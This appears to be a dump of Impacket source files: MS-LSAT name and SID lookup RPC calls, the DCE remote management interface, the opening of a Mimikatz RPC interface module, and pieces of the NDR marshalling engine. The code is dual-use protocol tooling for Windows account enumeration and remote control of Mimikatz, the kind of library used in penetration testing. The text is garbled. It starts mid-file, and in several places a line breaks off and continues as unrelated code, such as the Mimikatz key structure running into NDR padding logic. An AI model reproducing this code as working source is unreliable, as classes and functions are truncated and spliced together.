RPC_UNICODE_STRING\n\n# 2.2.3.1 STRING\nclass STRING(NDRSTRUCT):\n commonHdr = (\n ('MaximumLength','.\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom impacket import nt_errors\nfrom impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \\\n NULL\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.samr import SID_NAME_USE\nfrom impacket.uuid import uuidtup_to_bin\n\nMSRPC_UUID_LSAT = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in nt_errors.ERROR_MESSAGES:\n error_msg_short = nt_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] \n return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 2.2.10 ACCESS_MASK\nPOLICY_LOOKUP_NAMES = 0x00000800\n\n################################################################################\n# STRUCTURES\n################################################################################\n# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST\nclass LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY),\n ('MaxEntries', ULONG),\n )\n\nclass PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER):\n referent = (\n ('Data', LSAPR_REFERENCED_DOMAIN_LIST),\n )\n\n# 2.2.14 LSA_TRANSLATED_SID\nclass LSA_TRANSLATED_SID(NDRSTRUCT):\n structure = (\n ('Use', SID_NAME_USE),\n ('RelativeId', ULONG),\n ('DomainIndex', LONG),\n )\n\n# 2.2.15 LSAPR_TRANSLATED_SIDS\nclass LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray):\n item = LSA_TRANSLATED_SID\n\nclass PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSA_TRANSLATED_SID_ARRAY),\n )\n\nclass LSAPR_TRANSLATED_SIDS(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Sids', PLSA_TRANSLATED_SID_ARRAY),\n )\n\n# 2.2.16 LSAP_LOOKUP_LEVEL\nclass LSAP_LOOKUP_LEVEL(NDRENUM):\n class enumItems(Enum):\n LsapLookupWksta = 1\n LsapLookupPDC = 2\n LsapLookupTDL = 3\n LsapLookupGC = 4\n LsapLookupXForestReferral = 5\n LsapLookupXForestResolve = 6\n LsapLookupRODCReferralToFullDC = 7\n\n# 2.2.17 LSAPR_SID_INFORMATION\nclass LSAPR_SID_INFORMATION(NDRSTRUCT):\n structure = (\n ('Sid', PRPC_SID),\n )\n\n# 2.2.18 LSAPR_SID_ENUM_BUFFER\nclass LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):\n item = LSAPR_SID_INFORMATION\n\nclass PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSAPR_SID_INFORMATION_ARRAY),\n )\n\nclass LSAPR_SID_ENUM_BUFFER(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY),\n )\n\n# 2.2.19 LSAPR_TRANSLATED_NAME\nclass LSAPR_TRANSLATED_NAME(NDRSTRUCT):\n structure = (\n ('Use', SID_NAME_USE),\n ('Name', RPC_UNICODE_STRING),\n ('DomainIndex', LONG),\n )\n\n# 2.2.20 LSAPR_TRANSLATED_NAMES\nclass LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray):\n item = LSAPR_TRANSLATED_NAME\n\nclass PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSAPR_TRANSLATED_NAME_ARRAY),\n )\n\nclass LSAPR_TRANSLATED_NAMES(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Names', PLSAPR_TRANSLATED_NAME_ARRAY),\n )\n\n# 2.2.21 LSAPR_TRANSLATED_NAME_EX\nclass LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT):\n structure = (\n ('Use', SID_NAME_USE),\n ('Name', RPC_UNICODE_STRING),\n ('DomainIndex', LONG),\n ('Flags', ULONG),\n )\n\n# 2.2.22 LSAPR_TRANSLATED_NAMES_EX\nclass LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray):\n item = LSAPR_TRANSLATED_NAME_EX\n\nclass PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY),\n )\n\nclass LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY),\n )\n\n# 2.2.23 LSAPR_TRANSLATED_SID_EX\nclass LSAPR_TRANSLATED_SID_EX(NDRSTRUCT):\n structure = (\n ('Use', SID_NAME_USE),\n ('RelativeId', ULONG),\n ('DomainIndex', LONG),\n ('Flags', ULONG),\n )\n\n# 2.2.24 LSAPR_TRANSLATED_SIDS_EX\nclass LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray):\n item = LSAPR_TRANSLATED_SID_EX\n\nclass PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY),\n )\n\nclass LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY),\n )\n\n# 2.2.25 LSAPR_TRANSLATED_SID_EX2\nclass LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT):\n structure = (\n ('Use', SID_NAME_USE),\n ('Sid', PRPC_SID),\n ('DomainIndex', LONG),\n ('Flags', ULONG),\n )\n\n# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2\nclass LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray):\n item = LSAPR_TRANSLATED_SID_EX2\n\nclass PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER):\n referent = (\n ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY),\n )\n\nclass LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT):\n structure = (\n ('Entries', ULONG),\n ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY),\n )\n\nclass RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):\n item = RPC_UNICODE_STRING\n\n################################################################################\n# RPC CALLS\n################################################################################\n# 3.1.4.4 LsarGetUserName (Opnum 45)\nclass LsarGetUserName(NDRCALL):\n opnum = 45\n structure = (\n ('SystemName', LPWSTR),\n ('UserName', PRPC_UNICODE_STRING),\n ('DomainName', PRPC_UNICODE_STRING),\n )\n\nclass LsarGetUserNameResponse(NDRCALL):\n structure = (\n ('UserName', PRPC_UNICODE_STRING),\n ('DomainName', PRPC_UNICODE_STRING),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.5 LsarLookupNames4 (Opnum 77)\nclass LsarLookupNames4(NDRCALL):\n opnum = 77\n structure = (\n ('Count', ULONG),\n ('Names', RPC_UNICODE_STRING_ARRAY),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n ('LookupOptions', ULONG),\n ('ClientRevision', ULONG),\n )\n\nclass LsarLookupNames4Response(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.6 LsarLookupNames3 (Opnum 68)\nclass LsarLookupNames3(NDRCALL):\n opnum = 68\n structure = (\n ('PolicyHandle', LSAPR_HANDLE),\n ('Count', ULONG),\n ('Names', RPC_UNICODE_STRING_ARRAY),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n ('LookupOptions', ULONG),\n ('ClientRevision', ULONG),\n )\n\nclass LsarLookupNames3Response(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.7 LsarLookupNames2 (Opnum 58)\nclass LsarLookupNames2(NDRCALL):\n opnum = 58\n structure = (\n ('PolicyHandle', LSAPR_HANDLE),\n ('Count', ULONG),\n ('Names', RPC_UNICODE_STRING_ARRAY),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n ('LookupOptions', ULONG),\n ('ClientRevision', ULONG),\n )\n\nclass LsarLookupNames2Response(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.8 LsarLookupNames (Opnum 14)\nclass LsarLookupNames(NDRCALL):\n opnum = 14\n structure = (\n ('PolicyHandle', LSAPR_HANDLE),\n ('Count', ULONG),\n ('Names', RPC_UNICODE_STRING_ARRAY),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n )\n\nclass LsarLookupNamesResponse(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedSids', LSAPR_TRANSLATED_SIDS),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.9 LsarLookupSids3 (Opnum 76)\nclass LsarLookupSids3(NDRCALL):\n opnum = 76\n structure = (\n ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n ('LookupOptions', ULONG),\n ('ClientRevision', ULONG),\n )\n\nclass LsarLookupSids3Response(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.10 LsarLookupSids2 (Opnum 57)\nclass LsarLookupSids2(NDRCALL):\n opnum = 57\n structure = (\n ('PolicyHandle', LSAPR_HANDLE),\n ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n ('LookupOptions', ULONG),\n ('ClientRevision', ULONG),\n )\n\nclass LsarLookupSids2Response(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n# 3.1.4.11 LsarLookupSids (Opnum 15)\nclass LsarLookupSids(NDRCALL):\n opnum = 15\n structure = (\n ('PolicyHandle', LSAPR_HANDLE),\n ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES),\n ('LookupLevel', LSAP_LOOKUP_LEVEL),\n ('MappedCount', ULONG),\n )\n\nclass LsarLookupSidsResponse(NDRCALL):\n structure = (\n ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),\n ('TranslatedNames', LSAPR_TRANSLATED_NAMES),\n ('MappedCount', ULONG),\n ('ErrorCode', NTSTATUS),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n 14 : (LsarLookupNames, LsarLookupNamesResponse),\n 15 : (LsarLookupSids, LsarLookupSidsResponse),\n 45 : (LsarGetUserName, LsarGetUserNameResponse),\n 57 : (LsarLookupSids2, LsarLookupSids2Response),\n 58 : (LsarLookupNames2, LsarLookupNames2Response),\n 68 : (LsarLookupNames3, LsarLookupNames3Response),\n 76 : (LsarLookupSids3, LsarLookupSids3Response),\n 77 : (LsarLookupNames4, LsarLookupNames4Response),\n}\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef hLsarGetUserName(dce, userName = NULL, domainName = NULL):\n request = LsarGetUserName()\n request['SystemName'] = NULL\n request['UserName'] = userName\n request['DomainName'] = domainName\n return dce.request(request)\n\ndef hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):\n request = LsarLookupNames4()\n request['Count'] = len(names)\n for name in names:\n itemn = RPC_UNICODE_STRING()\n itemn['Data'] = name\n request['Names'].append(itemn)\n request['TranslatedSids']['Sids'] = NULL\n request['LookupLevel'] = lookupLevel\n request['LookupOptions'] = lookupOptions\n request['ClientRevision'] = clientRevision\n\n return dce.request(request)\n\ndef hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):\n request = LsarLookupNames3()\n request['PolicyHandle'] = policyHandle\n request['Count'] = len(names)\n for name in names:\n itemn = RPC_UNICODE_STRING()\n itemn['Data'] = name\n request['Names'].append(itemn)\n request['TranslatedSids']['Sids'] = NULL\n request['LookupLevel'] = lookupLevel\n request['LookupOptions'] = lookupOptions\n request['ClientRevision'] = clientRevision\n\n return dce.request(request)\n\ndef hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):\n request = LsarLookupNames2()\n request['PolicyHandle'] = policyHandle\n request['Count'] = len(names)\n for name in names:\n itemn = RPC_UNICODE_STRING()\n itemn['Data'] = name\n request['Names'].append(itemn)\n request['TranslatedSids']['Sids'] = NULL\n request['LookupLevel'] = lookupLevel\n request['LookupOptions'] = lookupOptions\n request['ClientRevision'] = clientRevision\n\n return dce.request(request)\n\ndef hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):\n request = LsarLookupNames()\n request['PolicyHandle'] = policyHandle\n request['Count'] = len(names)\n for name in names:\n itemn = RPC_UNICODE_STRING()\n itemn['Data'] = name\n request['Names'].append(itemn)\n request['TranslatedSids']['Sids'] = NULL\n request['LookupLevel'] = lookupLevel\n\n return dce.request(request)\n\ndef hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):\n request = LsarLookupSids2()\n request['PolicyHandle'] = policyHandle\n request['SidEnumBuffer']['Entries'] = len(sids)\n for sid in sids:\n itemn = LSAPR_SID_INFORMATION()\n itemn['Sid'].fromCanonical(sid)\n request['SidEnumBuffer']['SidInfo'].append(itemn)\n\n request['TranslatedNames']['Names'] = NULL\n request['LookupLevel'] = lookupLevel\n request['LookupOptions'] = lookupOptions\n request['ClientRevision'] = clientRevision\n\n return dce.request(request)\n\ndef hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):\n request = LsarLookupSids()\n request['PolicyHandle'] = policyHandle\n request['SidEnumBuffer']['Entries'] = len(sids)\n for sid in sids:\n itemn = LSAPR_SID_INFORMATION()\n itemn['Sid'].fromCanonical(sid)\n request['SidEnumBuffer']['SidInfo'].append(itemn)\n\n request['TranslatedNames']['Names'] = NULL\n request['LookupLevel'] = lookupLevel\n\n return dce.request(request)\n" }, { "path": "impacket/dcerpc/v5/mgmt.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [C706] Remote Management Interface implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray\nfrom impacket.dcerpc.v5.epm import PRPC_IF_ID\nfrom impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket import nt_errors\n\nMSRPC_UUID_MGMT = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in nt_errors.ERROR_MESSAGES:\n error_msg_short = nt_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] \n return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n\nclass rpc_if_id_p_t_array(NDRUniConformantArray):\n item = PRPC_IF_ID\n\nclass rpc_if_id_vector_t(NDRSTRUCT):\n structure = (\n ('count',ULONG),\n ('if_id',rpc_if_id_p_t_array),\n )\n structure64 = (\n ('count',ULONGLONG),\n ('if_id',rpc_if_id_p_t_array),\n )\n\nclass rpc_if_id_vector_p_t(NDRPOINTER):\n referent = (\n ('Data', rpc_if_id_vector_t),\n )\n\nerror_status = ULONG\n################################################################################\n# STRUCTURES\n################################################################################\n\n################################################################################\n# RPC CALLS\n################################################################################\nclass inq_if_ids(NDRCALL):\n opnum = 0\n structure = (\n )\n\nclass inq_if_idsResponse(NDRCALL):\n structure = (\n ('if_id_vector', rpc_if_id_vector_p_t),\n ('status', error_status),\n )\n\nclass inq_stats(NDRCALL):\n opnum = 1\n structure = (\n ('count', ULONG),\n )\n\nclass inq_statsResponse(NDRCALL):\n structure = (\n ('count', ULONG),\n ('statistics', DWORD_ARRAY),\n ('status', error_status),\n )\n\nclass is_server_listening(NDRCALL):\n opnum = 2\n structure = (\n )\n\nclass is_server_listeningResponse(NDRCALL):\n structure = (\n ('status', error_status),\n )\n\nclass stop_server_listening(NDRCALL):\n opnum = 3\n structure = (\n )\n\nclass stop_server_listeningResponse(NDRCALL):\n structure = (\n ('status', error_status),\n )\n\nclass inq_princ_name(NDRCALL):\n opnum = 4\n structure = (\n ('authn_proto', ULONG),\n ('princ_name_size', ULONG),\n )\n\nclass inq_princ_nameResponse(NDRCALL):\n structure = (\n ('princ_name', NDRUniConformantVaryingArray),\n ('status', error_status),\n )\n\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n 0 : (inq_if_ids, inq_if_idsResponse),\n 1 : (inq_stats, inq_statsResponse),\n 2 : (is_server_listening, is_server_listeningResponse),\n 3 : (stop_server_listening, stop_server_listeningResponse),\n 4 : (inq_princ_name, inq_princ_nameResponse),\n}\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef hinq_if_ids(dce):\n request = inq_if_ids()\n return dce.request(request)\n\ndef hinq_stats(dce, count = 4):\n request = inq_stats()\n request['count'] = count\n return dce.request(request)\n\ndef his_server_listening(dce):\n request = is_server_listening()\n return dce.request(request, checkError=False)\n\ndef hstop_server_listening(dce):\n request = stop_server_listening()\n return dce.request(request)\n\ndef hinq_princ_name(dce, authn_proto=0, princ_name_size=1):\n request = inq_princ_name()\n request['authn_proto'] = authn_proto\n request['princ_name_size'] = princ_name_size\n return dce.request(request, checkError=False)\n" }, { "path": "impacket/dcerpc/v5/mimilib.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Mimikatz Interface implementation, based on @gentilkiwi IDL\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\nfrom __future__ import division\nfrom __future__ import print_function\nimport binascii\nimport random\n\nfrom impacket import nt_errors\nfrom impacket.dcerpc.v5.dtypes import DWORD, ULONG\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.structure import Structure\n\nMSRPC_UUID_MIMIKATZ = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in nt_errors.ERROR_MESSAGES:\n error_msg_short = nt_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] \n return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\nCALG_DH_EPHEM = 0x0000aa02\nTPUBLICKEYBLOB = 0x6\nCUR_BLOB_VERSION = 0x2\nALG_ID = DWORD\nCALG_RC4 = 0x6801\n\n################################################################################\n# STRUCTURES\n################################################################################\nclass PUBLICKEYSTRUC(Structure):\n structure = (\n ('bType','B=0'),\n ('bVersion','B=0'),\n ('reserved',' 0:\n pad = (alignment - (soFar % alignment)) % alignment\n else:\n pad = 0\n\n return pad\n\n def getData(self, soFar = 0):\n data = b''\n for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:\n try:\n # Alignment of Primitive Types\n\n # NDR enforces NDR alignment of primitive data; that is, any primitive of size n\n # octets is aligned at a octet stream index that is a multiple of n.\n # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates\n # the number of an octet in an octet stream when octets are numbered, beginning with 0,\n # from the first octet in the stream. Where necessary, an alignment gap, consisting of\n # octets of unspecified value, precedes the representation of a primitive. The gap is\n # of the smallest size sufficient to align the primitive.\n pad = self.calculatePad(fieldTypeOrClass, soFar)\n if pad > 0:\n soFar += pad\n data += b'\\xbf'*pad\n\n res = self.pack(fieldName, fieldTypeOrClass, soFar)\n\n data += res\n soFar += len(res)\n except Exception as e:\n LOG.error(str(e))\n LOG.error(\"Error packing field '%s | %s' in %s\" % (fieldName, fieldTypeOrClass, self.__class__))\n raise\n\n return data\n\n def fromString(self, data, offset=0):\n offset0 = offset\n for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:\n try:\n # Alignment of Primitive Types\n\n # NDR enforces NDR alignment of primitive data; that is, any primitive of size n\n # octets is aligned at a octet stream index that is a multiple of n.\n # (In this version of NDR, n is one of {1, 2, 4, 8}.) An octet stream index indicates\n # the number of an octet in an octet stream when octets are numbered, beginning with 0,\n # from the first octet in the stream. Where necessary, an alignment gap, consisting of\n # octets of unspecified value, precedes the representation of a primitive. The gap is\n # of the smallest size sufficient to align the primitive.\n offset += self.calculatePad(fieldTypeOrClass, offset)\n\n offset += self.unpack(fieldName, fieldTypeOrClass, data, offset)\n except Exception as e:\n LOG.error(str(e))\n LOG.error(\"Error unpacking field '%s | %s | %r'\" % (fieldName, fieldTypeOrClass, data[offset:offset+256]))\n raise\n return offset - offset0\n\n def pack(self, fieldName, fieldTypeOrClass, soFar = 0):\n if isinstance(self.fields[fieldName], NDR):\n return self.fields[fieldName].getData(soFar)\n\n data = self.fields[fieldName]\n # void specifier\n if fieldTypeOrClass[:1] == '_':\n return b''\n\n # code specifier\n two = fieldTypeOrClass.split('=')\n if len(two) >= 2:\n try:\n return self.pack(fieldName, two[0], soFar)\n except:\n self.fields[fieldName] = eval(two[1], {}, self.fields)\n return self.pack(fieldName, two[0], soFar)\n\n if data is None:\n raise Exception('Trying to pack None')\n\n # literal specifier\n if fieldTypeOrClass[:1] == ':':\n if hasattr(data, 'getData'):\n return data.getData()\n return data\n\n # struct like specifier\n return pack(fieldTypeOrClass, data)\n\n def unpack(self, fieldName, fieldTypeOrClass, data, offset=0):\n if isinstance(self.fields[fieldName], NDR):\n return self.fields[fieldName].fromString(data, offset)\n\n # code specifier\n two = fieldTypeOrClass.split('=')\n if len(two) >= 2:\n return self.unpack(fieldName, two[0], data, offset)\n\n # literal specifier\n if fieldTypeOrClass == ':':\n if isinstance(fieldTypeOrClass, NDR):\n return self.fields[fieldName].fromString(data, offset)\n else:\n dataLen = self.getDataLen(data, offset)\n self.fields[fieldName] = data[offset:offset+dataLen]\n return dataLen\n\n # struct like specifier\n self.fields[fieldName] = unpack_from(fieldTypeOrClass, data, offset)[0]\n\n return calcsize(fieldTypeOrClass)\n\n def calcPackSize(self, fieldTypeOrClass, data):\n if isinstance(fieldTypeOrClass, str) is False:\n return len(data)\n\n # code specifier\n two = fieldTypeOrClass.split('=')\n if len(two) >= 2:\n return self.calcPackSize(two[0], data)\n\n # literal specifier\n if fieldTypeOrClass[:1] == ':':\n return len(data)\n\n # struct like specifier\n return calcsize(fieldTypeOrClass)\n\n def calcUnPackSize(self, fieldTypeOrClass, data, offset=0):\n if isinstance(fieldTypeOrClass, str) is False:\n return len(data) - offset\n\n # code specifier\n two = fieldTypeOrClass.split('=')\n if len(two) >= 2:\n return self.calcUnPackSize(two[0], data, offset)\n\n # array specifier\n two = fieldTypeOrClass.split('*')\n if len(two) == 2:\n return len(data) - offset\n\n # literal specifier\n if fieldTypeOrClass[:1] == ':':\n return len(data) - offset\n\n # struct like specifier\n return calcsize(fieldTypeOrClass)\n\n# NDR Primitives\nclass NDRSMALL(NDR):\n align = 1\n structure = (\n ('Data', 'b=0'),\n )\n\nclass NDRUSMALL(NDR):\n align = 1\n structure = (\n ('Data', 'B=0'),\n )\n\nclass NDRBOOLEAN(NDRSMALL):\n def dump(self, msg = None, indent = 0):\n if msg is None:\n msg = self.__class__.__name__\n if msg != '':\n print(msg, end=' ')\n\n if self['Data'] > 0:\n print(\" TRUE\")\n else:\n print(\" FALSE\")\n\nclass NDRCHAR(NDR):\n align = 1\n structure = (\n ('Data', 'c'),\n )\n\nclass NDRSHORT(NDR):\n align = 2\n structure = (\n ('Data', ' 0:\n soFar += pad0\n arrayPadding = b'\\xef'*pad0\n else:\n arrayPadding = b''\n # And now, let's pretend we put the item in\n soFar += arrayItemSize\n data = self.fields[fieldName].getData(soFar)\n data = arrayPadding + pack(arrayPackStr, self.getArrayMaximumSize(fieldName)) + data\n else:\n pad = self.calculatePad(fieldTypeOrClass, soFar)\n if pad > 0:\n soFar += pad\n data += b'\\xcc'*pad\n\n data += self.pack(fieldName, fieldTypeOrClass, soFar)\n\n # Any referent information to pack?\n if isinstance(self.fields[fieldName], NDRCONSTRUCTEDTYPE):\n data += self.fields[fieldName].getDataReferents(soFar0 + len(data))\n data += self.fields[fieldName].getDataReferent(soFar0 + len(data))\n soFar = soFar0 + len(data)\n\n except Exception as e:\n LOG.error(str(e))\n LOG.error(\"Error packing field '%s | %s' in %s\" % (fieldName, fieldTypeOrClass, self.__class__))\n raise\n\n return data\n\n def calcPackSize(self, fieldTypeOrClass, data):\n if isinstance(fieldTypeOrClass, str) is False:\n return len(data)\n\n # array specifier\n two = fieldTypeOrClass.split('*')\n if len(two) == 2:\n answer = 0\n for each in data:\n if self.isNDR(self.item):\n item = ':'\n else:\n item = self.item\n answer += self.calcPackSize(item, each)\n return answer\n else:\n return NDR.calcPackSize(self, fieldTypeOrClass, data)\n\n def getArrayMaximumSize(self, fieldName):\n if self.fields[fieldName].fields['MaximumCount'] is not None and self.fields[fieldName].fields['MaximumCount'] > 0:\n return self.fields[fieldName].fields['MaximumCount']\n else:\n return self.fields[fieldName].getArraySize()\n\n def getArraySize(self, fieldName, data, offset=0):\n if self._isNDR64:\n arrayItemSize = 8\n arrayUnPackStr = ' 